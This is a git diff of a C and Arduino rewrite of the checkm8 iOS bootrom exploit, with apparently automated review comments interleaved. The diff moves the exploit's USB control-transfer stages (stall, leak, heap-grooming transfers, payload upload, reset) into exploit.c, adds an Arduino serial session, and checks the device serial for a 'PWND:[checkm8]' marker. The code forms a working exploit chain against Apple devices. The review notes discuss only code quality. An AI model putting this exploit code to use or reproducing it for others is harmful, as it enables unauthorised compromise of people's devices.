diff --git a/checkm8_arduino/CMakeLists.txt b/checkm8_arduino/CMakeLists.txt
index d690522..0059cee 100644
--- a/checkm8_arduino/CMakeLists.txt
+++ b/checkm8_arduino/CMakeLists.txt
@@ -15,4 +15,5 @@ set(checkm8_arduino_PROGRAMMER avrispmkii)
 set(checkm8_arduino_PORT /dev/ttyACM0)
 include_directories(include)
+include_directories(../include)
 generate_arduino_firmware(checkm8_arduino)
\ No newline at end of file
diff --git a/checkm8_arduino/src/checkm8_arduino.ino b/checkm8_arduino/src/checkm8_arduino.ino
index da24245..178f570 100644
--- a/checkm8_arduino/src/checkm8_arduino.ino
+++ b/checkm8_arduino/src/checkm8_arduino.ino
@@ -1,5 +1,6 @@
-#include
+#include "Usb.h"
 #include "constants.h"
+#include "checkm8_config.h"
 USB Usb;
 USB_DEVICE_DESCRIPTOR desc_buf;
@@ -122,11 +123,9 @@ void heap_occupation()
 void setup()
 {
- Serial.begin(115200);
- Serial.println("checkm8 started");
- if(Usb.Init() == -1)
- Serial.println("usb init error");
- delay(200);
+ Serial.begin(ARDUINO_BAUD);
+ if(Usb.Init() == -1) Serial.println("failed to initialize USB host shield");
+ else Serial.print('\x00');
 }
 void loop()
@@ -135,7 +134,8 @@ void loop()
 state = Usb.getUsbTaskState();
 if(state != last_state)
 {
- Serial.print("usb state: "); Serial.println(state, HEX);
+ Serial.print("usb state: ");
+ Serial.println(state, HEX);
 last_state = state;
 }
 if(state == USB_STATE_ERROR)
@@ -144,7 +144,7 @@ void loop()
 }
 if(state == USB_STATE_RUNNING)
 {
- Usb.getDevDescr(addr, 0, 0x12, (uint8_t *) &desc_buf);
+ Usb.getDevDescr(addr, 0, 0x12, (uint8_t * ) & desc_buf);
 if(desc_buf.idVendor != 0x5ac || desc_buf.idProduct != 0x1227)
 {
 Usb.setUsbTaskState(USB_ATTACHED_SUBSTATE_RESET_DEVICE);
diff --git a/checkm8_remote/include/usb_helpers.h b/checkm8_remote/include/usb_helpers.h
index 6d2c84a..6271f7c 100644
--- a/checkm8_remote/include/usb_helpers.h
+++ b/checkm8_remote/include/usb_helpers.h
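Review bot: The handshake in setup() emits the single `'\x00'` success byte, but the host side of this protocol (open_device_session in usb_helpers.c, same commit) treats any other first byte as the start of a newline-terminated error string, and loop() keeps writing `usb state: …` lines to the same Serial port; if the host opens the port after setup() has already run, or the verification byte is lost, the first byte read is a letter of a status line and the session is reported as an Arduino error. A comment above setup() such as `// host handshake: send 0x00 on success, otherwise a '\n'-terminated error message` would at least pin the wire contract that both sides now depend on. The removed `delay(200)` after Usb.Init() may have been giving the host shield time to settle before the first task poll; whether the library still needs it is not visible here.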
@@ -38,12 +38,8 @@ int ctrl_transfer(struct pwned_device *dev,
 unsigned char *data, unsigned short data_len, unsigned int timeout);
-int stall(struct pwned_device *dev);
-int leak(struct pwned_device *dev);
-int no_leak(struct pwned_device *dev);
+int reset(struct pwned_device *dev);
+int serial_descriptor(struct pwned_device *dev, unsigned char *serial_buf, int len);
-int usb_req_stall(struct pwned_device *dev);
-int usb_req_leak(struct pwned_device *dev);
-int usb_req_no_leak(struct pwned_device *dev);
 #endif //IPWNDFU_REWRITE_C_LIBUSB_HELPERS_H
diff --git a/checkm8_remote/src/exploit.c b/checkm8_remote/src/exploit.c
index 490dddb..93ed4b2 100644
--- a/checkm8_remote/src/exploit.c
+++ b/checkm8_remote/src/exploit.c
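Review bot: The two new prototypes carry no contract: nothing says what the `int` result of `reset` or `serial_descriptor` means, and in the implementation (usb_helpers.c, this commit) the libusb branch of `serial_descriptor` returns nothing while the WITH_ARDUINO branches of both are empty. A header comment such as `/* Read the device's serial string into serial_buf (len bytes). Returns the number of bytes written, or a CHECKM8_FAIL_* code. */` would fix the expectation that check_function relies on, once the implementation actually returns it. `len` is declared `int` while the only caller passes `sizeof(serial_buf)`; that mirrors libusb's own `int length`, but it is worth stating in the comment that a negative or oversized `len` is not accepted.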
@@ -2,33 +2,117 @@ #include #include "usb_helpers.h" -#ifndef WITH_ARDUINO #include #include #include -typedef int(stage_function)(struct pwned_device *dev); +static unsigned char data_0xA_0xC0_buf[192] = + { + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA + }; -int complete_stage(struct pwned_device *device, stage_function *func) +static unsigned char data_0xA_0xC1_buf[193] = + { + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 
0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, + 0xA + }; + +static unsigned char data_0x0_0x40_buf[64] = + { + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0 + }; + +static unsigned char data_0x0_0x41_buf[65] = + { + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0 + }; + +static unsigned char data_0x0_0xC0_buf[192] = + { + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, + 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0 + }; + +int stall(struct pwned_device *dev) { - checkm8_debug_indent("complete_stage(dev = %p, func = %p)\n", device, func); - int ret; + checkm8_debug_indent("stall(dev = %p)\n", dev); + return partial_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, data_0xA_0xC0_buf, 0xC0, 1); +} - ret = open_device_session(device); - if(ret == LIBUSB_ERROR_NO_DEVICE || ret == LIBUSB_ERROR_ACCESS) - { - checkm8_debug_indent("\tfailed to get device bundle\n"); - return CHECKM8_FAIL_NODEV; - } +int leak(struct pwned_device *dev) +{ + checkm8_debug_indent("leak(dev = %p)\n", dev); + no_error_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, data_0x0_0xC0_buf, 0xC0, 1); + return CHECKM8_SUCCESS; +} - checkm8_debug_indent("\tgot device bundle, calling function\n"); - ret = func(device); +int no_leak(struct pwned_device *dev) +{ + checkm8_debug_indent("no_leak(dev = %p)\n", dev); + no_error_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, data_0xA_0xC1_buf, 0xC1, 1); + return CHECKM8_SUCCESS; +} - checkm8_debug_indent("\treleasing device bundle\n"); - close_device_session(device); +int usb_req_stall(struct pwned_device *dev) +{ + checkm8_debug_indent("usb_req_stall(dev = %p)\n", dev); + unsigned char data[0]; + no_error_ctrl_transfer(dev, 0x2, 3, 0, 0x80, data, 0, 10); + return CHECKM8_SUCCESS; +} - return ret; +int usb_req_leak(struct pwned_device *dev) +{ + checkm8_debug_indent("usb_req_leak(dev = %p)\n", dev); + no_error_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, data_0x0_0x40_buf, 0x40, 1); + return CHECKM8_SUCCESS; +} + +int usb_req_no_leak(struct pwned_device *dev) +{ + checkm8_debug_indent("usb_req_no_leak(dev = %p)\n", dev); + no_error_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, data_0x0_0x41_buf, 0x41, 1); + return CHECKM8_SUCCESS; } int stage1_function(struct pwned_device *dev) 
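Review bot: `stall`, `leak`, `no_leak`, `usb_req_stall`, `usb_req_leak` and `usb_req_no_leak` were removed from usb_helpers.h in this commit but are still defined with external linkage here; exploit.c is now their only user, so each should be `static int` to keep them out of the global namespace and let the compiler warn when one becomes unused. `unsigned char data[0];` in usb_req_stall is a zero-length array (a GNU extension, not C11) that exists only to yield a pointer for a zero-byte transfer — stage2_function already passes `NULL` with `data_len` 0 for the same purpose, so `no_error_ctrl_transfer(dev, 0x2, 3, 0, 0x80, NULL, 0, 10);` is the consistent form, assuming the helper does not touch `data` when the length is 0 as that existing call already relies on. The three all-zero tables do not need their literal initialisers: `static unsigned char data_0x0_0xC0_buf[192];` is zero-filled by static storage and makes the length checkable at a glance. `leak`, `no_leak` and the `usb_req_*` helpers discard `no_error_ctrl_transfer`'s result while `stall` propagates `partial_ctrl_transfer`'s; that asymmetry looks intentional but deserves a one-line comment on `stall`.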
@@ -37,15 +121,12 @@ int stage1_function(struct pwned_device *dev)
 unsigned int i;
 stall(dev);
- for(i = 0; i < 5; i++)
- {
- no_leak(dev);
- }
+ for(i = 0; i < 5; i++) no_leak(dev);
 usb_req_leak(dev);
 no_leak(dev);
 checkm8_debug_indent("\treset\n");
- libusb_reset_device(dev->bundle->handle);
+ reset(dev);
 return CHECKM8_SUCCESS;
 }
@@ -59,7 +140,7 @@ int stage2_function(struct pwned_device *dev)
 no_error_ctrl_transfer(dev, 0x21, 4, 0, 0, NULL, 0, 0);
 checkm8_debug_indent("\treset\n");
- libusb_reset_device(dev->bundle->handle);
+ reset(dev);
 return CHECKM8_SUCCESS;
 }
@@ -87,7 +168,7 @@ int stage3_function(struct pwned_device *dev)
 no_error_ctrl_transfer(dev, 0x21, 1, 0, 0, &payload_buf[2048], 352, 100);
 checkm8_debug_indent("reset\n");
- libusb_reset_device(dev->bundle->handle);
+ reset(dev);
 return CHECKM8_SUCCESS;
 }
@@ -96,12 +177,9 @@ int check_function(struct pwned_device *dev)
 checkm8_debug_indent("checking device serial\n");
 unsigned char serial_buf[128];
 unsigned int i;
- struct libusb_device_handle *handle = dev->bundle->handle;
- struct libusb_device_descriptor *desc = dev->bundle->descriptor;
- libusb_get_string_descriptor_ascii(handle, desc->iSerialNumber, serial_buf, sizeof(serial_buf));
+ serial_descriptor(dev, serial_buf, sizeof(serial_buf));
 checkm8_debug_indent("\tgot serial %s\n", serial_buf);
-
 for(i = 0; i < 13; i++)
 {
 if(serial_buf[99 + i] != "PWND:[checkm8]"[i])
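Review bot: In the check_function hunk `serial_buf` is never initialised and the result of `serial_descriptor()` is ignored, so when the descriptor read fails — or under WITH_ARDUINO, where `serial_descriptor` is an empty stub in this commit — `checkm8_debug_indent("\tgot serial %s\n", serial_buf)` prints an unterminated buffer and the `serial_buf[99 + i]` comparison reads indeterminate bytes; both are undefined behaviour, and exploit_device's "already exploited" decision rests on them. Initialise with `unsigned char serial_buf[128] = {0};` and return a `CHECKM8_FAIL_*` code when `serial_descriptor` reports fewer than 112 bytes (the loop reads indices 99..111), which requires the helper to return the descriptor length. The `reset(dev)` calls in the stage1, stage2 and stage3 hunks above likewise discard the value the new wrapper forwards from `libusb_reset_device`, where the old direct call at least made that visible. check_function continues outside this hunk.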
@@ -112,76 +190,84 @@ int check_function(struct pwned_device *dev)
 return CHECKM8_SUCCESS;
 }
-#endif
 struct pwned_device *exploit_device()
 {
+ int ret;
 struct pwned_device *res = calloc(1, sizeof(struct pwned_device));
 checkm8_debug_indent("exploit_device() -> dev = %p\n", res);
 res->status = DEV_NORMAL;
 res->idVendor = DEV_IDVENDOR;
 res->idProduct = DEV_IDPRODUCT;
- int ret = open_device_session(res);
-
 #ifdef WITH_ARDUINO
-
+ res->ard_fd = -1;
 #else
 res->bundle = calloc(1, sizeof(struct libusb_device_bundle));
+#endif
- int ret = complete_stage(res, check_function);
+ ret = open_device_session(res);
+ if(IS_CHECKM8_FAIL(ret))
+ {
+ checkm8_debug_indent("\tfailed to open device session\n");
+ free_device(res);
+ return NULL;
+ }
+
+ ret = check_function(res);
 if(ret == CHECKM8_SUCCESS)
 {
 // already exploited
 res->status = DEV_PWNED;
+ close_device_session(res);
 return res;
 }
 else if(ret == CHECKM8_FAIL_NODEV)
 {
 // no device found
- free(res);
+ free_device(res);
 return NULL;
 }
 else
 {
 // normal device found - exploit
- ret = complete_stage(res, stage1_function);
+ ret = stage1_function(res);
 if(ret == CHECKM8_SUCCESS)
 {
- ret = complete_stage(res, stage2_function);
+ ret = stage2_function(res);
 usleep(500000);
 }
 if(ret == CHECKM8_SUCCESS)
 {
- ret = complete_stage(res, stage3_function);
+ ret = stage3_function(res);
 usleep(500000);
 }
 if(ret == CHECKM8_SUCCESS)
 {
- ret = complete_stage(res, check_function);
+ ret = check_function(res);
 }
 if(ret == CHECKM8_SUCCESS)
 {
 res->status = DEV_PWNED;
+ close_device_session(res);
 return res;
 }
 else
 {
- free(res);
+ free_device(res);
 return NULL;
 }
 }
-#endif
 }
 void free_device(struct pwned_device *dev)
 {
-#ifndef WITH_ARDUINO
 close_device_session(dev);
+#ifndef WITH_ARDUINO
+ free(dev->bundle);
 #endif
-
 free(dev);
 }
\ No newline at end of file
diff --git a/checkm8_remote/src/usb_helpers.c b/checkm8_remote/src/usb_helpers.c
index 7a24222..c9aa67a 100644
--- a/checkm8_remote/src/usb_helpers.c
+++ b/checkm8_remote/src/usb_helpers.c
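Review bot: When `open_device_session` fails, the new early exit calls `free_device(res)`, which unconditionally calls `close_device_session` on a session that was never opened; under WITH_ARDUINO that is `close(-1)`, which fails with EBADF and logs a misleading `failed to close arduino fd`. Making the teardown idempotent — `if(!is_device_session_open(dev)) return CHECKM8_SUCCESS;` at the top of close_device_session, or freeing `res->bundle` and `res` directly in this branch — keeps the failure path quiet and correct. Both `calloc` results, `res` and on the libusb path `res->bundle`, are still dereferenced without a NULL check, here and inside open_device_session. With the session now opened once up front rather than per stage, check_function can presumably no longer produce CHECKM8_FAIL_NODEV the way complete_stage did, so the `else if(ret == CHECKM8_FAIL_NODEV)` branch looks dead and deserves either a comment saying which helper can still return it or removal.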
@@ -1,13 +1,19 @@
 #include "usb_helpers.h"
+#ifdef WITH_ARDUINO
+
+#include
+#include
+#include
+
+#else
+
 #include
 #include
-#include
-#include
-#include
-
 #include "libusbi.h"
+#endif
+
 int open_device_session(struct pwned_device *dev)
 {
 checkm8_debug_indent("open_device_session(dev = %p)\n", dev);
@@ -15,21 +21,49 @@ int open_device_session(struct pwned_device *dev)
 #ifdef WITH_ARDUINO
 // based on https://github.com/todbot/arduino-serial/blob/master/arduino-serial-lib.c
 struct termios toptions;
- int ard = open(ARDUINO_DEV, O_RDWR | O_NONBLOCK);
- if(ard == -1)
+ char buf;
+ int ard_fd = open(ARDUINO_DEV, O_RDWR | O_NONBLOCK);
+ if(ard_fd == -1)
 {
 checkm8_debug_indent("\tfailed to open arduino device %s\n", ARDUINO_DEV);
 return CHECKM8_FAIL_NODEV;
 }
- if(tcgetattr(ard, &toptions) < 0)
+ checkm8_debug_indent("\topened arduino device %s\n", ARDUINO_DEV);
+ if(tcgetattr(ard_fd, &toptions) < 0)
 {
 checkm8_debug_indent("\tfailed to get arduino terminal attributes\n");
+ close(ard_fd);
 return CHECKM8_FAIL_NODEV;
 }
- cfsetispeed(&toptions, ARDUINO_BAUD);
- cfsetospeed(&toptions, ARDUINO_BAUD);
+ speed_t brate;
+ switch(ARDUINO_BAUD)
+ {
+ case 4800:
+ brate = B4800; break;
+
+ case 9600:
+ brate = B9600; break;
+
+ case 19200:
+ brate = B19200; break;
+
+ case 38400:
+ brate = B38400; break;
+
+ case 57600:
+ brate = B57600; break;
+
+ case 115200:
+ brate = B115200; break;
+
+ default:
+ brate = B9600; break;
+ }
+
+ cfsetispeed(&toptions, brate);
+ cfsetospeed(&toptions, brate);
 toptions.c_cflag &= ~PARENB;
 toptions.c_cflag &= ~CSTOPB;
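Review bot: The `default:` arm of the new `switch(ARDUINO_BAUD)` silently programs B9600 when the configured rate is not in the table, while the sketch (checkm8_arduino.ino, this commit) calls `Serial.begin(ARDUINO_BAUD)` with the raw number; a typo in checkm8_config.h would leave the two sides at different rates and the handshake byte garbled, with no diagnostic. Since ARDUINO_BAUD is a macro the table could be a preprocessor chain (`#if ARDUINO_BAUD == 115200` … `#else` `#error "unsupported ARDUINO_BAUD"`) so an unsupported rate fails the build; at minimum `default:` should log, `close(ard_fd)` and `return CHECKM8_FAIL_NODEV;` rather than guess. `cfsetispeed`/`cfsetospeed` return -1 on an invalid speed and both results are discarded. `char buf;` is declared here without an initialiser and first written by the read loop in the next hunk; see the note there.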
@@ -45,14 +79,36 @@ int open_device_session(struct pwned_device *dev)
 toptions.c_cc[VMIN] = 0;
 toptions.c_cc[VTIME] = 0;
- tcsetattr(ard, TCSANOW, &toptions);
- if(tcsetattr(ard, TCSAFLUSH, &toptions) < 0)
+ tcsetattr(ard_fd, TCSANOW, &toptions);
+ if(tcsetattr(ard_fd, TCSAFLUSH, &toptions) < 0)
 {
 checkm8_debug_indent("\tfailed to set terminal attributes");
+ close(ard_fd);
 return CHECKM8_FAIL_NODEV;
 }
- return CHECKM8_SUCCESS;
+ checkm8_debug_indent("\tset arduino terminal attributes\n");
+
+ // read a setup verification byte
+ while(read(ard_fd, &buf, 1) == 0);
+ if(buf == '\x00')
+ {
+ checkm8_debug_block("\tarduino successfully setup\n");
+ dev->ard_fd = ard_fd;
+ return CHECKM8_SUCCESS;
+ }
+ else
+ {
+ checkm8_debug_indent("\tarduino error: ");
+ while(buf != '\n')
+ {
+ checkm8_debug_block("%c", buf);
+ while(read(ard_fd, &buf, 1) == 0);
+ }
+
+ close(ard_fd);
+ return CHECKM8_FAIL_NOTDONE;
+ }
 #else
 int i, usb_dev_count, ret = CHECKM8_FAIL_NODEV;
 libusb_device **usb_device_list = NULL;
@@ -136,7 +192,15 @@ int close_device_session(struct pwned_device *dev)
 checkm8_debug_indent("close_device_session(dev = %p)\n", dev);
 #ifdef WITH_ARDUINO
+ int ret = close(dev->ard_fd);
+ dev->ard_fd = -1;
+ if(ret == -1)
+ {
+ checkm8_debug_indent("\tfailed to close arduino fd\n");
+ return CHECKM8_FAIL_NODEV;
+ }
+ return CHECKM8_SUCCESS;
 #else
 if(dev->bundle->handle != NULL)
 {
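Review bot: `while(read(ard_fd, &buf, 1) == 0);` treats every non-zero return as a received byte, so a -1 from read (EAGAIN on platforms where a non-blocking tty read reports no data that way, or EIO once the board is unplugged) ends the loop and `buf` — declared `char buf;` in the previous hunk with no initialiser — is compared while indeterminate; the same pattern in the `while(buf != '\n')` drain loop means an error message without a trailing newline spins forever. Keep the `ssize_t` result and fail on error: `ssize_t n; do { n = read(ard_fd, &buf, 1); } while(n == 0); if(n < 0) { close(ard_fd); return CHECKM8_FAIL_NODEV; }`, and a bounded retry count or a `poll()` timeout would replace the busy-wait in both loops. In the close_device_session hunk below, `close(dev->ard_fd)` runs even when `ard_fd` is already -1 (exploit_device calls free_device on a session that never opened), so `if(dev->ard_fd == -1) return CHECKM8_SUCCESS;` before the close avoids the spurious EBADF and log line.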
@@ -160,30 +224,21 @@ int close_device_session(struct pwned_device *dev)
 free(dev->bundle->descriptor);
 dev->bundle->descriptor = NULL;
 }
-#endif
 return CHECKM8_SUCCESS;
+#endif
 }
 int is_device_session_open(struct pwned_device *dev)
 {
 #ifdef WITH_ARDUINO
-
+ return dev->ard_fd != -1;
 #else
 return dev->bundle->ctx != NULL && dev->bundle->device != NULL && dev->bundle->handle != NULL && dev->bundle->descriptor != NULL;
 #endif
 }
-#ifndef WITH_ARDUINO
-void LIBUSB_CALL async_ctrl_transfer_cb(struct libusb_transfer *transfer)
-{
- checkm8_debug_indent("transfer status: %s (%i / %i)\n",
- libusb_error_name(transfer->status),
- transfer->actual_length,
- transfer->length);
-}
-#endif
 int partial_ctrl_transfer(struct pwned_device *dev, unsigned char bmRequestType, unsigned char bRequest,
@@ -207,7 +262,7 @@ int partial_ctrl_transfer(struct pwned_device *dev,
 struct libusb_transfer *usb_transfer = libusb_alloc_transfer(0);
 libusb_fill_control_setup(usb_transfer_buf, bmRequestType, bRequest, wValue, wIndex, data_len);
 memcpy(&usb_transfer_buf[8], data, data_len);
- libusb_fill_control_transfer(usb_transfer, dev->bundle->handle, usb_transfer_buf, async_ctrl_transfer_cb, NULL, 1);
+ libusb_fill_control_transfer(usb_transfer, dev->bundle->handle, usb_transfer_buf, NULL, NULL, 1);
 checkm8_debug_indent("\tsubmiting urb\n");
 ret = libusb_submit_transfer(usb_transfer);
@@ -263,8 +318,7 @@ int no_error_ctrl_transfer(struct pwned_device *dev,
 }
 }
- ret = libusb_control_transfer(dev->bundle->handle, bmRequestType, bRequest, wValue, wIndex, data, data_len,
- timeout);
+ ret = libusb_control_transfer(dev->bundle->handle, bmRequestType, bRequest, wValue, wIndex, data, data_len, timeout);
 checkm8_debug_indent("\tgot error %s but ignoring\n", libusb_error_name(ret));
 return CHECKM8_SUCCESS;
 #endif
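Review bot: Passing `NULL` as the callback in the partial_ctrl_transfer hunk removes `async_ctrl_transfer_cb`, which was the only place the asynchronous transfer's completion status and `actual_length` were observed; the rest of partial_ctrl_transfer is outside this hunk, so it is not visible whether the transfer is still reaped via libusb_handle_events, its status checked, or the `libusb_alloc_transfer(0)` result ever freed with libusb_free_transfer. libusb does accept a NULL callback, but a comment at the call such as `// no completion callback: the outcome of this transfer is intentionally not inspected` would record that this is deliberate, if that is indeed the case. Should the status still matter for debugging, a `static` callback that only logs when CHECKM8_LOGGING is on keeps the diagnostic without the unused-symbol noise that presumably motivated the removal.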
@@ -276,6 +330,10 @@ int ctrl_transfer(struct pwned_device *dev,
 unsigned char *data, unsigned short data_len, unsigned int timeout)
 {
+ checkm8_debug_indent(
+ "ctrl_transfer(dev = %p, bmRequestType = %i, bRequest = %i, wValue = %i, wIndex = %i, data = %p, data_len = %i, timeout = %i)\n",
+ dev, bmRequestType, bRequest, wValue, wIndex, data, data_len, timeout);
+
 #ifdef WITH_ARDUINO
 // TODO
 #else
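Review bot: The new trace passes `timeout`, declared `unsigned int` on the signature line just above, to a `%i` conversion; `%u` is the matching specifier, and `%#x` would be the more readable choice for the USB setup fields, e.g. `wValue = %#x, wIndex = %#x, data_len = %u, timeout = %u`. `bmRequestType`, `bRequest` and `data_len` are promoted to `int` and are fine with `%i`; the types of `wValue`/`wIndex` are not visible in this hunk. The WITH_ARDUINO branch of this function is still `// TODO`, so a WITH_ARDUINO build of the callers silently does nothing here; the function body continues outside the hunk.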
@@ -287,104 +345,23 @@ int ctrl_transfer(struct pwned_device *dev, #endif } -static unsigned char data_0xA_0xC0_buf[192] = - { - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, - 0xA, 0xA, 